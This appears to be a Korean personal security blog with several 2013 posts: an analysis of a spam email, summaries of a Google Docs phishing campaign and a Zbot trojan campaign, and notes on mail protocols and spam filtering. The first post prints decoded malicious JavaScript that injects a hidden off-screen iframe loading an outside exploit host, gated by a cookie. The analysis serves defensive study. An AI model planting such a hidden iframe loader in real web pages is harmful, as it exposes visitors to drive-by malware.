posted by Kwan's 2013. 10. 22. 00:43

오랜만에 악성스크립트로 연결시키는 스팸메일을 내 이메일을 통해 받아서 기록해 둔다.


발신 : <richartl@bladechevy.com>

수신 : <power2618@naver.com>

날짜 : 13-10-21 (월) 03:21

제목 : I want you to be healthy


[본문 내용] 

<html><body>

http://mhr.ro/pride.html Do you know what your lover wants during nights?

<_body><_html>


[발신자 정보 위치 - bladechevy.com]



[http://mhr.ro/pride.html - 사이트 본문 내용]



[디코딩]


Redirecting -> http://albertacanadapills.nl">


-----------------------------------------------------------------------------------------------


 function q09() {

 var static='ajax';

 var controller='index.php';

 var q = document.createElement('iframe');


 q.src = 'http://lanotfo.com/exit.php';

 q.style.position = 'absolute';

 q.style.color = '55';

 q.style.height = '55px';

 q.style.width = '55px';

 q.style.left = '100055';

 q.style.top = '100055';


 if (!document.getElementById('q')) {

 document.write('<p id=\'q\' class=\'q09\' ></p>');

 document.getElementById('q').appendChild(q);

 }

}

function SetCookie(cookieName,cookieValue,nDays,path) {

 var today = new Date();

 var expire = new Date();

 if (nDays==null || nDays==0) nDays=1;

 expire.setTime(today.getTime() + 3600000*24*nDays);

 document.cookie = cookieName+"="+escape(cookieValue)

 + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");

}

function GetCookie( name ) {

 var start = document.cookie.indexOf( name + "=" );

 var len = start + name.length + 1;

 if ( ( !start ) &&

 ( name != document.cookie.substring( 0, name.length ) ) )

 {

 return null;

 }

 if ( start == -1 ) return null;

 var end = document.cookie.indexOf( ";", len );

 if ( end == -1 ) end = document.cookie.length;

 return unescape( document.cookie.substring( len, end ) );

}

if (navigator.cookieEnabled)

{

if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');


q09();

}

}


[세부 정보]


http://lanotfo.com/exit.php // 500 internal server error

=========================

Server IP(s):

0.0.0.0

=========================



http://albertacanadapills.nl



[도식화]





댓글을 달아 주세요

  1. 처리 2013.10.22 09:18  Addr  Edit/Del  Reply

    전문가 다됬네 ㅎㅎㅎ

    • Kwan's 2013.10.23 04:10 신고  Addr  Edit/Del

      앗 형 잘 지내시지요??ㅎㅎ

      과찬의 말씀입니다 ㅎㅎ 저는 아직 멀고도 멀었는걸요~

      조만간 얼굴 비추러 찾아뵙겠습니다 : )

posted by Kwan's 2013. 9. 17. 14:54


Google Docs으로 부터 여러분에게 보내진 “보안문서(Secure Document)”인척 하는 대규모의 피싱 공격이 이번 주 동안 유행하였습니다.

보안업계에 종사하는 우리 같은 사람들은 놀라지 않을지도 모르지만, 피싱 공격들은 전통적인 방어를 피하는 매우 효과적인 방법들 중의 하나임을 스스로 증명하고 있습니다.

많은 기관들이 Google 클라우드로 옮겨감에 따라, 이런 류의 피싱 미끼는 계속해서 범죄용으로 사용되는 결과를 낳을 것입니다.

그 이메일은 다음과 같습니다.:

안녕하세요.

당신의 금융기관에서 Google Docs를 사용한 보안 문서를 보내었습니다.
문서를 보기 위해 Google Docs 웹페이지를 방문하려면 아래 링크를 클릭하십시오.
여기를 클릭하세요. 문서는 중요하다고 되어 있습니다.

수고하십시오.
The Gmail Team

피싱 이메일이 아주 특별한 것은 아니지만, 이 피싱 이메일은 제 눈에 걸립니다. 게다가 다소 그럴 듯한 미끼이고, 모두가 속을 수 있는 익스플로잇 입니다.

만약 그 링크를 클릭하면, 여러분은 대만에서 호스팅되고 있는 피싱 페이지를 보게 됩니다.

그 페이지는 여러분의 Google 계정정보를 요청할 뿐만 아니라, Yahoo!, Outlook.com, Hotmail, AOL, Comcast, Verizon, 163.com 그리고 기타 다른 이메일 계정으로도 접속 가능하다고 말합니다.

물론, 이 입력폼을 채우면 당장 낭패를 보게 될 것입니다. 여러분의 상세정보는 해커들이 바라는 목적이 무엇이든지 간에 감염된 서버로 보내집니다.

여러분은 이렇게 생각할지도 모릅니다. “그래서 뭘? 내 Gmail은 나의 국적/삶/경력을 파괴할 비밀의 전부는 아니거든.”

그러나 당신이 틀렸다는 것을 곧 알게 될 것입니다. 왜냐하면 당신 이메일은 당신의 온라인 신원 대부분을 파헤치는 열쇠이기 때문입니다.

당신의 은행계좌 비밀번호를 잊어버렸습니까? 걱정하지 마세요, 그들이 당신에게 비밀번호 리셋 링크를 이메일로 보낼 것입니다.

여러분의 회사가 클라우드 서비스를 이용합니까? 여러분의 이메일 계정이 이런 시스템에 접속하는 열쇠인 것 같습니다.

놀랍게도 피싱은 성공한 기술입니다.

그렇다면, 세상에서 가장 강력한 미디어 조직들 중 몇 곳을 감염시킬 수 있는 기술적인 재능(피싱)을 지닌 시리아전자군대(Syrian Electronic Army)에게 물어 보세요.

IT 관리자로서, 이것은 여러분의 직원들에게 위험을 가르치는 기회입니다.

이것이 유행하고 있는 피싱들 중 가장 설득력 있는 것이 아닐지도 모르지만, 여러분의 직원을 교육하는 유용한 도구입니다.

많은 기업들이 Google이나 기타 클라우드 서비스 제공업체를 이용하여 중요한 IT 서비스를 제공하고 있습니다. 언뜻 보기에 이것은 매우 믿음직스러울 수 있습니다.

희생자가 되지 않으려면 무엇을 해야 할까요? 나는 모든 중요한 서비스에 대해 나의 브라우저에 바로가기를 만듭니다.

만약 나의 이메일이나 은행 또는 다른 온라인 서비스에 접속할 필요가 있다면, 그런 링크를 클릭하지 않고, 바로 즐겨찾기를 클릭하는 것입니다.


댓글을 달아 주세요

posted by Kwan's 2013. 8. 17. 18:40


최근 공부하는것 중 메일서버에 대한 이야기를 들어서 이렇게 도식화를 그려본다. 사용자가 보낼때는 SMTP 포로토콜를 이용하여 전송을 하며 메일서버를 거치면서 상대방에게 가기까지는 모두 SMTP 프로토콜을 이용한다. 하지만, 받는 사람은 메일 서버에 도착되어 있는 메일을 클라이언트로 가져올 때 적용되는 프로토콜 사용하는 POP3/IMAP 프로토콜를 이용하여 확인을 하게 된다.


SMTP (Simple Mail Transfer Protocol) : 클라이언트가 메일을 보내거나, 메일 서버끼리 메일을 주고 받을 때 적용되는 프로토콜 이며 사용하는 TCP 포트번호는 25번이다. 


POP3(Post Office Protocol) : 메일 서버에 도착되어 있는 메일을 클라이언트로 가져올 때 적용되는 프로토콜

윈도 라이브 핫메일, G메일, 및 Yahoo! 메일과 같은 대부분의 웹 메일에서 지원한다.


IMAP(Internet Mail Access Protocol) : 온라인 모드와 오프라인 모드를 모두 지원하므로 POP3를 사용할 때와 달리 이메일 메시지를 서버에 남겨 두었다가 나중에 지울 수 있다. 그러므로 다른 컴퓨터 환경에서 서로 다른 이메일 클라이언트가 같은 이메일을 받아올 수 있는 장점을 가지고 있다.


그렇다면 스팸메일에 대한 대처는 어떻게 하면 될까?


아래와 같이 스팸장비는 받는 메일 서버 바로 앞에 있다고 볼 수있다.

스팸메일을 전송할때 메일 서버를 이용하여 전송하는 경우도 있지만 다이렉트로 보내는 사람이 받는사람 메일 서버로 보낼 수도 있기 때문이다. 차단에 대해서는 아래 그림과 같이 차단을 한다. 차단이 된 메일에 대해서는 반송/삭제/보관과 같은 조치가 취해질 수 있다. 이를 통해 정상메일로 분류가 된다면 메일 서버를 통해 받는 사람에게 전달이 된다.


'security > 공부 하는 것들' 카테고리의 다른 글

TCP/IP 프로토콜 아키텍처  (0) 2013.08.21
메일 서버 원리 / 스팸 메일의 차단  (0) 2013.08.17

댓글을 달아 주세요

posted by Kwan's 2013. 1. 22. 18:45


소포스랩은 보안 메시지처럼 가장하여 이메일을 통해 스팸메일로 보내진 광범위한 맬웨어 공격을 차단하고 있습니다.

“보안 메시지가 도착했습니다.”라는 제목을 가진 그 이메일은 수신인을 속여 첨부된 ZIP파일을 열도록 합니다.

하지만, <securedoc.zip>이란 ZIP파일에 포함된 것은 소포스 제품이 Troj/Zbot-DPM로 감지하는 트로이목마입니다.

다음은 전형적인 메시지를 보여줍니다.(전체 버전을 보시려면 이미지를 클릭하세요.)

보안 메시지가 도착했습니다.

SECUREDOC이란 첨부파일을 열어서 보안 메시지를 읽어주세요.여러분은 그 파일을 열거나 여러분의 컴퓨터에 다운로드 하게 될 것입니다. 제일 좋은 방법은, 우선 그 파일을 다운로드한 다음에 그 파일을 여는겁니다.

이 메시지의 타당성에 대해 걱정한다면, 발신인에게 직접 연락하세요.
Key 이메일 암호화 서비스에 대한 문의사항이 있으시면, 기술지원 888.764.7941로 연락하세요.

처음 사용자 - 첨부파일을 연 다음 등록을 하셔야 합니다.
Help - https://mailsafe.keybank.com/websafe/help?topic=RegEnvelope
아이언포트 암호화(IronPort Encryption)란 - https://mailsafe.keybank.com/websafe/about

Zeus라고도 알려진 악명 높은 Zbot 계열의 맬웨어는 여러분의 컴퓨터를 하이재킹하여 범죄용 봇넷의 일부로 만들 수 있습니다. 지난 몇 년간 사이버범죄자들은 서로 다른 버전의 Zbot을 사용하여 온라인 뱅킹 계좌에서 돈을 훔치고, 소셜 네트워킹 사이트의 로그인 정보와 이메일/FTP 정보 등을 훔쳤습니다.

수신인들이 왜 위에 보여준 것과 같은 보안 메시지를 실제 받았다고 믿게 되는지, 그리고 어리석게도 그 첨부파일을 열어서 그 안에 포함된 악성 실행파일을 실행시키게 되는지 이해하는 것은 쉽습니다.

현재 소포스랩은 이와 같은 메시지들이 스팸메일로 많이 보내지고 있는 것을 보고 있습니다. 그래서 여러분이 안티스팸이나 안티바이러스 제품이 업데이트되었는지, 그리고 이런 위협을 감지할 수 있는지 확인하길 바랍니다.

그리고 확인되지 않은 이메일 첨부파일을 열기 전에는 항상 주의 하시기 바랍니다.

댓글을 달아 주세요